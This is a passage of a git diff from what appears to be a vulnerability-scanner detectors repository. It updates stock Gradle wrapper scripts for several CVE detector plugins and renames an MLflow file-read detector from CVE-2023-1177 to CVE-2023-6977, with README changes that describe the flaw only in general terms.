strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/metabase_cve_2023_38646/gradlew.bat b/community/detectors/metabase_cve_2023_38646/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/metabase_cve_2023_38646/gradlew.bat +++ b/community/detectors/metabase_cve_2023_38646/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/minio_cve_2023_28432/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/minio_cve_2023_28432/gradlew b/community/detectors/minio_cve_2023_28432/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/minio_cve_2023_28432/gradlew +++ b/community/detectors/minio_cve_2023_28432/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/minio_cve_2023_28432/gradlew.bat b/community/detectors/minio_cve_2023_28432/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/minio_cve_2023_28432/gradlew.bat +++ b/community/detectors/minio_cve_2023_28432/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/mlflow_cve_2023_1177/README.md b/community/detectors/mlflow_cve_2023_1177/README.md deleted file mode 100644 index 62701d362..000000000 --- a/community/detectors/mlflow_cve_2023_1177/README.md +++ /dev/null @@ -1,17 +0,0 @@ -# MLflow LFI/RFI CVE-2023-1177 Detector - -This detector checks for MLflow LFI/RFI vulnerability (CVE-2023-1177). - -- https://github.com/advisories/GHSA-xg73-94fp-g449 -- https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/ -- https://nvd.nist.gov/vuln/detail/CVE-2023-1177 - -## Build jar file for this plugin - -Using `gradlew`: - -```shell -./gradlew jar -``` - -Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/mlflow_cve_2023_1177/settings.gradle b/community/detectors/mlflow_cve_2023_1177/settings.gradle deleted file mode 100644 index a6838988b..000000000 --- a/community/detectors/mlflow_cve_2023_1177/settings.gradle +++ /dev/null @@ -1 +0,0 @@ -rootProject.name = 'mlflow_cve_2023_1177' diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar index e6441136f..d64cd4917 100644 Binary files a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties index b82aa23a4..d04736436 100644 --- a/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/mlflow_cve_2023_6014/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-8.7-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/community/detectors/mlflow_cve_2023_6014/gradlew.bat b/community/detectors/mlflow_cve_2023_6014/gradlew.bat index 25da30dbd..93e3f59f1 100644 --- a/community/detectors/mlflow_cve_2023_6014/gradlew.bat +++ b/community/detectors/mlflow_cve_2023_6014/gradlew.bat @@ -43,11 +43,11 @@ set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 if %ERRORLEVEL% equ 0 goto execute -echo. 1>&2 -echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 -echo. 1>&2 -echo Please set the JAVA_HOME variable in your environment to match the 1>&2 -echo location of your Java installation. 1>&2 +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. goto fail @@ -57,11 +57,11 @@ set JAVA_EXE=%JAVA_HOME%/bin/java.exe if exist "%JAVA_EXE%" goto execute -echo. 1>&2 -echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 -echo. 1>&2 -echo Please set the JAVA_HOME variable in your environment to match the 1>&2 -echo location of your Java installation. 1>&2 +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. goto fail diff --git a/community/detectors/mlflow_cve_2023_6977/README.md b/community/detectors/mlflow_cve_2023_6977/README.md new file mode 100644 index 000000000..3b1d6db99 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/README.md @@ -0,0 +1,19 @@ +# MLflow LFI/RFI CVE-2023-6977 Detector + +This detector checks for MLflow LFI/RFI vulnerability (CVE-2023-6977). This +vulnerability enables malicious users to read sensitive files on the server. It +encompasses both CVE-2023-1177 and CVE-2023-2780 because exploit of +CVE-2023-6977 bypasses patches of these vulnerabilities by using symlinks. + +- https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf +- https://nvd.nist.gov/vuln/detail/CVE-2023-6977 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/mlflow_cve_2023_1177/build.gradle b/community/detectors/mlflow_cve_2023_6977/build.gradle similarity index 95% rename from community/detectors/mlflow_cve_2023_1177/build.gradle rename to community/detectors/mlflow_cve_2023_6977/build.gradle index e5e582ff7..acace65c6 100644 --- a/community/detectors/mlflow_cve_2023_1177/build.gradle +++ b/community/detectors/mlflow_cve_2023_6977/build.gradle @@ -2,9 +2,9 @@ plugins { id 'java-library' } -description = 'Tsunami MLflow LFI/RFI (CVE-2023-1177) VulnDetector plugin.' +description = 'Tsunami MLflow LFI/RFI (CVE-2023-6977) VulnDetector plugin.' group 'com.google.tsunami' -version '0.0.1-SNAPSHOT' +version 